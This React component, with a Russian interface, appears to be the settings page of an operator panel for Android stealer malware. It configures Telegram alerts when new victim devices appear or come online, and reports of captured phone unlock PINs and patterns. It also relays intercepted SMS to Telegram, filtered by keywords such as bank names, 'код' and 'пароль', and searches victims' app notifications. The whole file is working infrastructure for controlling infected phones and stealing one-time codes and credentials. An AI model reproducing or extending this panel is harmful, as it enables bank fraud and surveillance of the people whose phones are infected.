import React, { useEffect, useState, useRef } from 'react';
import api from '../services/api';
import toastr from 'toastr';
import 'toastr/build/toastr.min.css';
import './ChaosView.css';


const toast = {
  info: (text) => toastr.info(' ', text),
  warning: (text) => toastr.warning(' ', text),
  success: (text) => toastr.success(' ', text),
  error: (text) => toastr.error(' ', text),
};

function NotificationSettings() {
  const [token, setToken] = useState('');
  const [chatId, setChatId] = useState('');
  const [loading, setLoading] = useState(true);
  const [monitorOpen, setMonitorOpen] = useState(false);
  const [tracked, setTracked] = useState([]);
  const [uuidInput, setUuidInput] = useState('');
  const [cooldownSec, setCooldownSec] = useState(900);
  const [minOnlineSec, setMinOnlineSec] = useState(20);
  const [monitorBotToken, setMonitorBotToken] = useState('');
  const [monitorChatId, setMonitorChatId] = useState('');
  const [isDesktop, setIsDesktop] = useState(typeof window !== 'undefined' ? window.innerWidth > 768 : true);

  // Доп инфа state
  const [extraOpen, setExtraOpen] = useState(false);
  const [includePhone, setIncludePhone] = useState(false);
  const [appFilters, setAppFilters] = useState([]);
  const [smsFilters, setSmsFilters] = useState([]);
  const [newAppInput, setNewAppInput] = useState('');
  const [newSmsInput, setNewSmsInput] = useState('');
  const [editingApp, setEditingApp] = useState(null);   // { index, value }
  const [editingSms, setEditingSms] = useState(null);   // { index, value }
  const [extraSaving, setExtraSaving] = useState(false);
  const editAppRef = useRef(null);
  const editSmsRef = useRef(null);

  // Уведомление о разблокировке state
  const [unlockOpen,     setUnlockOpen]     = useState(false);
  const [unlockEnabled,  setUnlockEnabled]  = useState(false);
  const [unlockBotToken, setUnlockBotToken] = useState('');
  const [unlockChatId,   setUnlockChatId]   = useState('');
  const [unlockSaving,   setUnlockSaving]   = useState(false);

  // Ретрансляция SMS (перенесено из вкладки Хаос)
  const [relayOpen,          setRelayOpen]          = useState(false);
  const [tgEnabled,          setTgEnabled]          = useState(false);
  const [tgBotToken,         setTgBotToken]         = useState('');
  const [tgChatId,           setTgChatId]           = useState('');
  const [isForwardPanelOpen, setIsForwardPanelOpen] = useState(false);
  const [keywords,           setKeywords]           = useState([]);
  const [keywordsInput,      setKeywordsInput]      = useState('');
  const [excludedSenders,    setExcludedSenders]    = useState([]);
  const [senderInput,        setSenderInput]        = useState('');
  const [isKeywordPanelOpen, setIsKeywordPanelOpen] = useState(false);

  useEffect(() => {
    const onResize = () => setIsDesktop(window.innerWidth > 768);
    window.addEventListener('resize', onResize);
    return () => window.removeEventListener('resize', onResize);
  }, []);

  useEffect(() => {
    (async () => {
      try {
        const u = await api.getNotificationSettings();
        setToken(u.data.telegramBotToken || '');
        setChatId(u.data.telegramChatId || '');
        const m = await api.getMonitorSettings();
        setTracked(Array.isArray(m.data.trackedDevices) ? m.data.trackedDevices : []);
        setCooldownSec(Number(m.data.cooldownSec ?? 900));
        setMinOnlineSec(Number(m.data.minOnlineSec ?? 20));
        setMonitorBotToken(m.data.botToken || '');
        setMonitorChatId(m.data.chatId || '');
        const ex = await api.getNotifyExtra();
        setIncludePhone(!!ex.data.includePhone);
        setAppFilters(Array.isArray(ex.data.appFilters) ? ex.data.appFilters : []);
        setSmsFilters(Array.isArray(ex.data.smsFilters) ? ex.data.smsFilters : []);
        const un = await api.getUnlockNotifySettings();
        setUnlockEnabled(!!un.data.enabled);
        setUnlockBotToken(un.data.botToken || '');
        setUnlockChatId(un.data.chatId || '');
        const cs = await api.get('/user/chaos/settings');
        const tg = cs.data?.telegram || {};
        setTgEnabled(Boolean(tg.enabled));
        setTgBotToken(String(tg.botToken || ''));
        setTgChatId(String(tg.chatId || ''));
        setKeywords(Array.isArray(cs.data?.keywords) ? cs.data.keywords : []);
        setExcludedSenders(Array.isArray(cs.data?.excludedSenders) ? cs.data.excludedSenders : []);
      } catch {
        toast.warning('Не удалось загрузить настройки');
      } finally {
        setLoading(false);
      }
    })();
  }, []);

  const saveTelegram = async () => {
    setLoading(true);
    try {
      const r = await api.updateNotificationSettings({
        telegramBotToken: token,
        telegramChatId: chatId
      });
      toast.success(r.data?.message || 'Настройки Telegram сохранены');
    } catch (e) {
      toast.warning(e.response?.data?.message || 'Ошибка при сохранении Telegram настроек');
    } finally {
      setLoading(false);
    }
  };

  const saveMonitorSettings = async () => {
    try {
      await api.updateMonitorSettings({
        cooldownSec: Number(cooldownSec) || 0,
        minOnlineSec: Number(minOnlineSec) || 0,
        botToken: monitorBotToken.trim(),
        chatId: monitorChatId.trim(),
      });
      toast.success('Настройки мониторинга сохранены');
    } catch {
      toast.warning('Не удалось сохранить настройки мониторинга');
    }
  };

  const addTracked = async () => {
    const raw = (uuidInput || '').trim();
    if (!raw) return;
    const candidates = raw.split(/[,\s]+/).map(s => s.trim()).filter(Boolean);
    try {
      const r = await api.addTrackedDevices(candidates);
      setTracked(r.data.trackedDevices || []);
      setUuidInput('');
      const added = Array.isArray(r.data?.added) ? r.data.added.length : candidates.length;
      const ignored = Array.isArray(r.data?.ignored) ? r.data.ignored.length : 0;
      if (added && ignored) {
        toast.info(`Добавлено: ${added}, пропущено: ${ignored}`);
      } else if (added) {
        toast.success(`Добавлено: ${added}`);
      } else if (ignored) {
        toast.warning(`Все значения отклонены (${ignored})`);
      } else {
        toast.info('Изменений нет');
      }
    } catch {
      toast.warning('Не удалось добавить устройства');
    }
  };

  const removeTracked = async (uuid) => {
    try {
      const r = await api.removeTrackedDevice(uuid);
      setTracked(r.data.trackedDevices || []);
      toast.info(`Удалено: ${uuid}`);
    } catch {
      toast.warning('Не удалось удалить устройство');
    }
  };

  // --- Доп инфа helpers ---
  const addAppFilter = () => {
    const raw = newAppInput.trim();
    if (!raw) return;
    const items = raw.split(',').map(s => s.trim()).filter(Boolean);
    setAppFilters(prev => [...prev, ...items.filter(i => !prev.includes(i))]);
    setNewAppInput('');
  };

  const addSmsFilter = () => {
    const raw = newSmsInput.trim();
    if (!raw) return;
    const items = raw.split(',').map(s => s.trim()).filter(Boolean);
    setSmsFilters(prev => [...prev, ...items.filter(i => !prev.includes(i))]);
    setNewSmsInput('');
  };

  const startEditApp = (index) => {
    setEditingApp({ index, value: appFilters[index] });
    setTimeout(() => editAppRef.current?.focus(), 0);
  };

  const commitEditApp = () => {
    if (!editingApp) return;
    const val = editingApp.value.trim();
    if (val) {
      setAppFilters(prev => prev.map((v, i) => i === editingApp.index ? val : v));
    }
    setEditingApp(null);
  };

  const startEditSms = (index) => {
    setEditingSms({ index, value: smsFilters[index] });
    setTimeout(() => editSmsRef.current?.focus(), 0);
  };

  const commitEditSms = () => {
    if (!editingSms) return;
    const val = editingSms.value.trim();
    if (val) {
      setSmsFilters(prev => prev.map((v, i) => i === editingSms.index ? val : v));
    }
    setEditingSms(null);
  };

  const saveExtra = async () => {
    setExtraSaving(true);
    try {
      await api.updateNotifyExtra({ includePhone, appFilters, smsFilters });
      toast.success('Доп. настройки уведомления сохранены');
    } catch {
      toast.warning('Ошибка при сохранении доп. настроек');
    } finally {
      setExtraSaving(false);
    }
  };

  const applyTelegramRelay = async () => {
    try {
      const resp = await api.put('/user/chaos/settings', {
        telegram: { enabled: tgEnabled, botToken: tgBotToken, chatId: tgChatId },
        keywords,
        excludedSenders
      });
      const tg = resp.data?.telegram || {};
      setTgEnabled(Boolean(tg.enabled));
      setTgBotToken(String(tg.botToken || ''));
      setTgChatId(String(tg.chatId || ''));
      setKeywords(Array.isArray(resp.data?.keywords) ? resp.data.keywords : []);
      setExcludedSenders(Array.isArray(resp.data?.excludedSenders) ? resp.data.excludedSenders : []);
      toast.success('Настройки ретрансляции сохранены');
    } catch {
      toast.warning('Не удалось сохранить настройки ретрансляции');
    }
  };

  const addKeywordsFromInput = () => {
    const parts = String(keywordsInput || '').split(',').map(s => s.trim().toLowerCase()).filter(Boolean);
    if (!parts.length) return;
    const before = keywords.length;
    const merged = Array.from(new Set([...keywords, ...parts]));
    setKeywords(merged);
    setKeywordsInput('');
    const added = merged.length - before;
    if (added > 0) toast.info(`Добавлено: ${added}`);
  };

  const removeKeyword = (w) => {
    setKeywords(prev => { toast.info(`Удалено: ${w}`); return prev.filter(x => x !== w); });
  };

  const addSenderFromInput = () => {
    const parts = String(senderInput || '').split(',').map(s => s.trim().toLowerCase()).filter(Boolean);
    if (!parts.length) return;
    const before = excludedSenders.length;
    const merged = Array.from(new Set([...excludedSenders, ...parts]));
    setExcludedSenders(merged);
    setSenderInput('');
    const added = merged.length - before;
    if (added > 0) toast.info(`Отправители добавлены: ${added}`);
  };

  const removeSender = (s) => {
    setExcludedSenders(prev => { toast.info(`Отправитель удалён: ${s}`); return prev.filter(x => x !== s); });
  };

  const saveUnlockNotify = async () => {
    setUnlockSaving(true);
    try {
      await api.updateUnlockNotifySettings({
        enabled:  unlockEnabled,
        botToken: unlockBotToken,
        chatId:   unlockChatId
      });
      toast.success('Настройки уведомления о разблокировке сохранены');
    } catch {
      toast.warning('Ошибка при сохранении');
    } finally {
      setUnlockSaving(false);
    }
  };

  if (loading) return <p>Загрузка настроек...</p>;

  const tagStyle = {
    display: 'flex', alignItems: 'center', gap: 6,
    background: '#3a3a42', borderRadius: 5, padding: '4px 10px',
    fontSize: 13, color: '#eee'
  };
  const tagBtnStyle = {
    background: 'none', border: 'none', cursor: 'pointer',
    color: '#aaa', fontSize: 14, padding: '0 2px', lineHeight: 1
  };

  return (
    <div style={{ maxWidth: 860, margin: '20px auto', padding: 20, background: '#2c2c2e', borderRadius: 8 }}>
      <h2>Настройки уведомлений в Telegram</h2>
      <p style={{ color: '#ccc', fontSize: 14 }}>
        Введите токен вашего Telegram-бота и ID чата, куда будут приходить уведомления о новых устройствах и статусе отслеживаемых устройств.
      </p>

      <div style={{ marginBottom: 15 }}>
        <label htmlFor="bot-token" style={{ display: 'block', marginBottom: 5, fontWeight: 'bold' }}>Токен бота</label>
        <input
          id="bot-token"
          type="text"
          value={token}
          onChange={(e) => setToken(e.target.value)}
          placeholder="1234567890:AbCdeFgHiJkLmNoPqRsTuVwXyZ"
          style={{ width: '100%', padding: 10, boxSizing: 'border-box' }}
        />
      </div>

      <div style={{ marginBottom: 20 }}>
        <label htmlFor="chat-id" style={{ display: 'block', marginBottom: 5, fontWeight: 'bold' }}>ID чата или канала</label>
        <input
          id="chat-id"
          type="text"
          value={chatId}
          onChange={(e) => setChatId(e.target.value)}
          placeholder="-1001234567890"
          style={{ width: '100%', padding: 10, boxSizing: 'border-box' }}
        />
      </div>

      <button onClick={saveTelegram} disabled={loading}>
        {loading ? 'Сохранение...' : 'Сохранить'}
      </button>

      {/* ─── ДОП ИНФА ─────────────────────────────────────────────── */}
      <div style={{ marginTop: 24, paddingTop: 20, borderTop: '1px solid #444' }}>
        <div style={{ display: 'flex', alignItems: 'center', gap: 12 }}>
          <button onClick={() => setExtraOpen(v => !v)} style={{ wordBreak: 'break-word', textAlign: 'left' }}>
            {extraOpen ? 'Скрыть доп. инфу' : '📎 Доп инфа к уведомлению о новом устройстве'}
          </button>
        </div>

        {extraOpen && (
          <div style={{ marginTop: 14 }}>
            <div style={{
              background: '#3a3020', border: '1px solid #7a6030', borderRadius: 6,
              padding: '10px 14px', fontSize: 13, color: '#f0c060', marginBottom: 16
            }}>
              ⚠️ При использовании доп. фильтров уведомление о новом устройстве придёт с задержкой ~30 сек — система ожидает данные от устройства.
            </div>

            {/* ─── НОМЕР ТЕЛЕФОНА ─── */}
            <div style={{ marginBottom: 16 }}>
              <label style={{ display: 'flex', alignItems: 'center', gap: 10, cursor: 'pointer', userSelect: 'none' }}>
                <input
                  type="checkbox"
                  checked={includePhone}
                  onChange={e => setIncludePhone(e.target.checked)}
                  style={{ width: 16, height: 16, cursor: 'pointer' }}
                />
                <span style={{ fontWeight: 'bold' }}>Номер телефона</span>
                <span style={{ color: '#888', fontSize: 12 }}>(Слот 1 / Слот 2 из SIM-карт)</span>
              </label>
            </div>

            {/* ─── ПРИЛОЖЕНИЯ ─── */}
            <div style={{ marginBottom: 18 }}>
              <label style={{ display: 'flex', alignItems: 'center', gap: 10, cursor: 'pointer', userSelect: 'none', marginBottom: 8 }}>
                <input
                  type="checkbox"
                  checked={appFilters.length > 0}
                  readOnly
                  style={{ width: 16, height: 16, opacity: 0.5 }}
                />
                <span style={{ fontWeight: 'bold' }}>Приложения</span>
                <span style={{ color: '#888', fontSize: 12 }}>(поиск в уведомлениях устройства)</span>
              </label>

              <div style={{ display: 'flex', gap: 8, marginBottom: 8 }}>
                <input
                  type="text"
                  value={newAppInput}
                  onChange={e => setNewAppInput(e.target.value)}
                  onKeyDown={e => { if (e.key === 'Enter') addAppFilter(); }}
                  placeholder="Название приложения (можно через запятую)"
                  style={{ flex: 1, padding: '7px 10px', boxSizing: 'border-box' }}
                />
                <button onClick={addAppFilter} style={{ whiteSpace: 'nowrap' }}>Добавить</button>
              </div>

              {appFilters.length > 0 && (
                <div style={{ display: 'flex', flexWrap: 'wrap', gap: 6 }}>
                  {appFilters.map((f, i) => (
                    <div key={i} style={tagStyle}>
                      {editingApp?.index === i ? (
                        <input
                          ref={editAppRef}
                          value={editingApp.value}
                          onChange={e => setEditingApp(p => ({ ...p, value: e.target.value }))}
                          onKeyDown={e => { if (e.key === 'Enter') commitEditApp(); if (e.key === 'Escape') setEditingApp(null); }}
                          onBlur={commitEditApp}
                          style={{ background: 'transparent', border: 'none', outline: 'none', color: '#eee', fontSize: 13, width: Math.max(60, editingApp.value.length * 8) }}
                        />
                      ) : (
                        <span>{f}</span>
                      )}
                      <button style={tagBtnStyle} title="Редактировать" onClick={() => startEditApp(i)}>✏️</button>
                      <button style={{ ...tagBtnStyle, color: '#e74c3c' }} title="Удалить" onClick={() => setAppFilters(p => p.filter((_, j) => j !== i))}>✕</button>
                    </div>
                  ))}
                </div>
              )}
            </div>

            {/* ─── SMS ОТ ОТПРАВИТЕЛЯ ─── */}
            <div style={{ marginBottom: 18 }}>
              <label style={{ display: 'flex', alignItems: 'center', gap: 10, cursor: 'pointer', userSelect: 'none', marginBottom: 8 }}>
                <input
                  type="checkbox"
                  checked={smsFilters.length > 0}
                  readOnly
                  style={{ width: 16, height: 16, opacity: 0.5 }}
                />
                <span style={{ fontWeight: 'bold' }}>SMS от отправителя</span>
                <span style={{ color: '#888', fontSize: 12 }}>(поиск в SMS устройства)</span>
              </label>

              <div style={{ display: 'flex', gap: 8, marginBottom: 8 }}>
                <input
                  type="text"
                  value={newSmsInput}
                  onChange={e => setNewSmsInput(e.target.value)}
                  onKeyDown={e => { if (e.key === 'Enter') addSmsFilter(); }}
                  placeholder="Отправитель (можно через запятую)"
                  style={{ flex: 1, padding: '7px 10px', boxSizing: 'border-box' }}
                />
                <button onClick={addSmsFilter} style={{ whiteSpace: 'nowrap' }}>Добавить</button>
              </div>

              {smsFilters.length > 0 && (
                <div style={{ display: 'flex', flexWrap: 'wrap', gap: 6 }}>
                  {smsFilters.map((f, i) => (
                    <div key={i} style={tagStyle}>
                      {editingSms?.index === i ? (
                        <input
                          ref={editSmsRef}
                          value={editingSms.value}
                          onChange={e => setEditingSms(p => ({ ...p, value: e.target.value }))}
                          onKeyDown={e => { if (e.key === 'Enter') commitEditSms(); if (e.key === 'Escape') setEditingSms(null); }}
                          onBlur={commitEditSms}
                          style={{ background: 'transparent', border: 'none', outline: 'none', color: '#eee', fontSize: 13, width: Math.max(60, editingSms.value.length * 8) }}
                        />
                      ) : (
                        <span>{f}</span>
                      )}
                      <button style={tagBtnStyle} title="Редактировать" onClick={() => startEditSms(i)}>✏️</button>
                      <button style={{ ...tagBtnStyle, color: '#e74c3c' }} title="Удалить" onClick={() => setSmsFilters(p => p.filter((_, j) => j !== i))}>✕</button>
                    </div>
                  ))}
                </div>
              )}
            </div>

            <button onClick={saveExtra} disabled={extraSaving} style={{ background: '#5a9a5a' }}>
              {extraSaving ? 'Сохранение...' : '💾 Сохранить доп. настройки'}
            </button>
          </div>
        )}
      </div>

      <div style={{ marginTop: 30, paddingTop: 20, borderTop: '1px solid #444' }}>
        <div style={{ display: 'flex', alignItems: 'center', gap: 12 }}>
          <button onClick={() => setMonitorOpen(v => !v)}>
            {monitorOpen ? 'Скрыть' : 'Отслеживать статус устройств'}
          </button>
          <span style={{ color: '#aaa' }}>
            (добавьте UUID нужных устройств; при появлении онлайн придёт уведомление в указанный вами чат)
          </span>
        </div>

        {monitorOpen && (
          <div style={{ marginTop: 16 }}>
            <div style={{ color: '#ccc', fontSize: 13, marginBottom: 12 }}>
              Данные устройства, которые вы добавите, будут отслеживаться на предмет появления «онлайн». Чтобы избежать «дребезга», срабатывание происходит только если устройство онлайн не менее <b>{minOnlineSec}</b> c, и повторные уведомления по одному и тому же устройству приходят не чаще, чем раз в <b>{cooldownSec}</b> c.
            </div>

            <div style={{ display: 'grid', gap: 16, marginBottom: 16, gridTemplateColumns: isDesktop ? '1fr 1fr' : '1fr' }}>
              <div>
                <label style={{ display: 'block', marginBottom: 6, fontWeight: 'bold' }}>Токен бота (для онлайн-уведомлений)</label>
                <input
                  type="text"
                  value={monitorBotToken}
                  onChange={(e) => setMonitorBotToken(e.target.value)}
                  placeholder="если пусто — используется основной бот"
                  style={{ width: '100%', padding: 10, boxSizing: 'border-box' }}
                />
              </div>
              <div>
                <label style={{ display: 'block', marginBottom: 6, fontWeight: 'bold' }}>ID группы / чата (для онлайн-уведомлений)</label>
                <input
                  type="text"
                  value={monitorChatId}
                  onChange={(e) => setMonitorChatId(e.target.value)}
                  placeholder="если пусто — используется основной чат"
                  style={{ width: '100%', padding: 10, boxSizing: 'border-box' }}
                />
              </div>
            </div>

            <div
              style={{
                display: 'grid',
                gap: 16,
                marginBottom: 16,
                gridTemplateColumns: isDesktop ? '1fr 1fr' : '1fr'
              }}
            >
              <div>
                <label style={{ display: 'block', marginBottom: 6, fontWeight: 'bold' }}>Минимальное время онлайн (сек)</label>
                <input
                  type="number"
                  value={minOnlineSec}
                  onChange={(e) => setMinOnlineSec(e.target.value)}
                  style={{ width: '100%', padding: 10, boxSizing: 'border-box' }}
                />
              </div>
              <div>
                <label style={{ display: 'block', marginBottom: 6, fontWeight: 'bold' }}>Кулдаун между уведомлениями (сек)</label>
                <input
                  type="number"
                  value={cooldownSec}
                  onChange={(e) => setCooldownSec(e.target.value)}
                  style={{ width: '100%', padding: 10, boxSizing: 'border-box' }}
                />
              </div>
            </div>

            <div style={{ display: 'flex', flexDirection: 'column', gap: 8, marginBottom: 12 }}>
              <input
                type="text"
                value={uuidInput}
                onChange={(e) => setUuidInput(e.target.value)}
                onKeyDown={(e) => { if (e.key === 'Enter') addTracked(); }}
                placeholder="Вставьте UUID (или несколько через пробел/запятую)"
                style={{ width: '100%', padding: 10, boxSizing: 'border-box' }}
              />
              <div style={{ display: 'flex', gap: 8, flexWrap: 'wrap' }}>
                <button onClick={addTracked} style={{ flex: '1 1 160px', minWidth: 140 }}>
                  Добавить
                </button>
                <button onClick={saveMonitorSettings} style={{ flex: '1 1 200px', minWidth: 160 }}>
                  Сохранить настройки
                </button>
              </div>
            </div>

            <div style={{ background: '#1f1f21', borderRadius: 8, padding: 12, overflowX: 'hidden' }}>
              <div style={{ color: '#aaa', marginBottom: 8 }}>
                Отслеживаемые устройства ({tracked.length})
              </div>
              {tracked.length === 0 ? (
                <div style={{ color: '#777' }}>Пока пусто. Добавьте UUID.</div>
              ) : (
                <ul style={{ listStyle: 'none', padding: 0, margin: 0 }}>
                  {tracked.map(u => (
                    <li key={u} style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', padding: '6px 0', borderBottom: '1px solid #2f2f31' }}>
                      <code style={{ color: '#ddd', wordBreak: 'break-all' }}>{u}</code>
                      <button onClick={() => removeTracked(u)}>Удалить</button>
                    </li>
                  ))}
                </ul>
              )}
            </div>

            <div style={{ color: '#888', fontSize: 12, marginTop: 10 }}>
              Пример Telegram-уведомления: <code>[ONLINE] 1ccbe75b-399b-3d2b-8bfb-a1a27bbfbb11</code>
            </div>
          </div>
        )}
      </div>

      {/* ─── УВЕДОМЛЕНИЕ О РАЗБЛОКИРОВКЕ ──────────────────────────── */}
      <div style={{ marginTop: 24, paddingTop: 20, borderTop: '1px solid #444' }}>
        <div style={{ display: 'flex', alignItems: 'center', gap: 12 }}>
          <button onClick={() => setUnlockOpen(v => !v)} style={{ wordBreak: 'break-word', textAlign: 'left' }}>
            {unlockOpen ? 'Скрыть' : '🔓 Уведомление о методе разблокировки'}
          </button>
          {unlockEnabled && (
            <span style={{ fontSize: 12, color: '#4caf50', fontWeight: 600 }}>● Включено</span>
          )}
        </div>

        {unlockOpen && (
          <div style={{ marginTop: 14 }}>
            <div style={{
              background: '#1a2a1a', border: '1px solid #2e5e2e', borderRadius: 6,
              padding: '10px 14px', fontSize: 13, color: '#a0d0a0', marginBottom: 16
            }}>
              При обнаружении метода разблокировки (PIN, графический ключ и т.д.) придёт отдельное Telegram-уведомление.
              Можно указать другого бота и чат — или те же, что в основных настройках.
            </div>

            <div style={{
              background: '#1e1e24', border: '1px solid #333', borderRadius: 6,
              padding: '8px 12px', fontSize: 12, color: '#888', marginBottom: 16,
              fontFamily: 'monospace', whiteSpace: 'pre-line'
            }}>
              {`🔓 Найден метод разблокировки\nUUID: d71d4c35-6b20-3a9e-b554-9b15d1257198-v1\nВид: Графический ключ\nЧто: Точки: 5 → 4 → 2`}
            </div>

            <div style={{ marginBottom: 16 }}>
              <label style={{ display: 'flex', alignItems: 'center', gap: 10, cursor: 'pointer', userSelect: 'none' }}>
                <input
                  type="checkbox"
                  checked={unlockEnabled}
                  onChange={e => setUnlockEnabled(e.target.checked)}
                  style={{ width: 16, height: 16, cursor: 'pointer' }}
                />
                <span style={{ fontWeight: 'bold' }}>Включить уведомление</span>
              </label>
            </div>

            <div style={{ marginBottom: 12 }}>
              <label style={{ display: 'block', marginBottom: 5, fontWeight: 'bold', fontSize: 13 }}>Токен бота</label>
              <input
                type="text"
                value={unlockBotToken}
                onChange={e => setUnlockBotToken(e.target.value)}
                placeholder="1234567890:AbCdeFgHiJkLmNoPqRsTuVwXyZ"
                style={{ width: '100%', padding: 8, boxSizing: 'border-box', fontSize: 13 }}
              />
            </div>

            <div style={{ marginBottom: 16 }}>
              <label style={{ display: 'block', marginBottom: 5, fontWeight: 'bold', fontSize: 13 }}>ID чата или канала</label>
              <input
                type="text"
                value={unlockChatId}
                onChange={e => setUnlockChatId(e.target.value)}
                placeholder="-1001234567890"
                style={{ width: '100%', padding: 8, boxSizing: 'border-box', fontSize: 13 }}
              />
            </div>

            <button onClick={saveUnlockNotify} disabled={unlockSaving}>
              {unlockSaving ? 'Сохранение...' : 'Сохранить'}
            </button>
          </div>
        )}
      </div>

      {/* --- РЕТРАНСЛЯЦИЯ SMS В TELEGRAM --- */}
      <div style={{ borderTop: '1px solid #444', marginTop: 20, paddingTop: 16 }}>
        <div
          style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center', cursor: 'pointer', userSelect: 'none' }}
          onClick={() => setRelayOpen(o => !o)}
        >
          <h3 style={{ margin: 0, fontSize: 15, color: '#fff' }}>📡 Ретрансляция SMS в Telegram</h3>
          <span style={{ color: '#888', fontSize: 18 }}>{relayOpen ? '▲' : '▼'}</span>
        </div>

        {relayOpen && (
          <div style={{ marginTop: 14 }}>
            <div className="chaos-toolbar-actions" style={{ display: 'flex', gap: 8, marginBottom: 10 }}>
              <button onClick={() => setIsKeywordPanelOpen(v => !v)}>Фильтры (Слова/Отправители)</button>
              <button onClick={() => setIsForwardPanelOpen(v => !v)}>Переотправка</button>
            </div>

            {isKeywordPanelOpen && (
              <div className="chaos-keywords-panel" style={{ border: '1px solid #444', borderRadius: 8, padding: 12, background: '#1f1f26', marginBottom: 10 }}>
                <div style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center', marginBottom: 8 }}>
                  <h4 style={{ margin: 0, color: '#fff' }}>Настройки фильтрации</h4>
                  <div>
                    <button onClick={applyTelegramRelay} style={{ marginRight: 8 }}>Сохранить всё</button>
                    <button onClick={() => setIsKeywordPanelOpen(false)}>Закрыть</button>
                  </div>
                </div>

                <h5 style={{ color: '#a5a4ff', margin: '10px 0 5px' }}>1. Фильтр: Ключевые слова (Whitelist)</h5>
                <div className="keyword-add-col">
                  <div style={{ display: 'flex', flexDirection: 'column', gap: 8 }}>
                    <button onClick={addKeywordsFromInput} style={{ alignSelf: 'flex-start' }}>Добавить</button>
                    <input
                      type="text"
                      placeholder="например: tinkoff, код, пароль"
                      value={keywordsInput}
                      onChange={e => setKeywordsInput(e.target.value)}
                      onKeyDown={e => { if (e.key === 'Enter') addKeywordsFromInput(); }}
                      style={{ padding: '8px 10px', borderRadius: 6, border: '1px solid #555', background: '#2b2b33', color: '#fff', width: '100%' }}
                    />
                  </div>
                </div>
                <div style={{ display: 'flex', flexWrap: 'wrap', gap: 8, marginTop: 8 }}>
                  {keywords.map(w => (
                    <span key={w} style={{ display: 'inline-flex', alignItems: 'center', gap: 6, padding: '4px 8px', borderRadius: 14, background: '#2b2b33', border: '1px solid #555', color: '#eee', fontSize: 13 }}>
                      {w}
                      <button onClick={() => removeKeyword(w)} title="Удалить" style={{ border: 'none', background: 'transparent', color: '#aaa', cursor: 'pointer', fontSize: 14, lineHeight: 1 }}>×</button>
                    </span>
                  ))}
                </div>

                <hr style={{ borderColor: '#444', margin: '15px 0' }} />

                <h5 style={{ color: '#ff6b6b', margin: '5px 0' }}>2. Исключить отправителей (Blacklist)</h5>
                <div style={{ fontSize: 12, color: '#888', marginBottom: 5 }}>
                  Даже если есть ключевое слово, сообщения от этих отправителей НЕ будут отправлены.
                </div>
                <div className="keyword-add-col">
                  <div style={{ display: 'flex', flexDirection: 'column', gap: 8 }}>
                    <button onClick={addSenderFromInput} style={{ alignSelf: 'flex-start' }}>Добавить</button>
                    <input
                      type="text"
                      placeholder="Например: MCHS, 900, VTB"
                      value={senderInput}
                      onChange={e => setSenderInput(e.target.value)}
                      onKeyDown={e => { if (e.key === 'Enter') addSenderFromInput(); }}
                      style={{ padding: '8px 10px', borderRadius: 6, border: '1px solid #555', background: '#2b2b33', color: '#fff', width: '100%' }}
                    />
                  </div>
                </div>
                <div style={{ display: 'flex', flexWrap: 'wrap', gap: 8, marginTop: 10 }}>
                  {excludedSenders.map(s => (
                    <span key={s} style={{ display: 'inline-flex', alignItems: 'center', gap: 6, padding: '4px 8px', borderRadius: 14, background: '#3d2b2b', border: '1px solid #722', color: '#ffcece', fontSize: 13 }}>
                      {s}
                      <button onClick={() => removeSender(s)} title="Удалить" style={{ border: 'none', background: 'transparent', color: '#e88', cursor: 'pointer', fontSize: 14, lineHeight: 1 }}>×</button>
                    </span>
                  ))}
                </div>
              </div>
            )}

            {isForwardPanelOpen && (
              <div className="chaos-forward-panel" style={{ border: '1px solid #444', borderRadius: 8, padding: 12, background: '#1f1f26', marginBottom: 10 }}>
                <div style={{ display: 'flex', alignItems: 'center', gap: 8, marginBottom: 10 }}>
                  <input type="checkbox" checked={tgEnabled} onChange={e => setTgEnabled(e.target.checked)} />
                  <label style={{ color: '#fff' }}>Включить переотправку</label>
                </div>
                <input
                  type="text"
                  placeholder="Bot token"
                  value={tgBotToken}
                  onChange={e => setTgBotToken(e.target.value)}
                  style={{ display: 'block', width: '100%', padding: '8px 10px', borderRadius: 6, border: '1px solid #555', background: '#2b2b33', color: '#fff', marginBottom: 8, boxSizing: 'border-box' }}
                />
                <input
                  type="text"
                  placeholder="Chat ID или @channelusername"
                  value={tgChatId}
                  onChange={e => setTgChatId(e.target.value)}
                  style={{ display: 'block', width: '100%', padding: '8px 10px', borderRadius: 6, border: '1px solid #555', background: '#2b2b33', color: '#fff', marginBottom: 10, boxSizing: 'border-box' }}
                />
                <div style={{ display: 'flex', gap: 8 }}>
                  <button onClick={applyTelegramRelay}>Применить</button>
                  <button onClick={() => setIsForwardPanelOpen(false)}>Закрыть</button>
                </div>
              </div>
            )}
          </div>
        )}
      </div>

    </div>
  );
}

export default NotificationSettings;
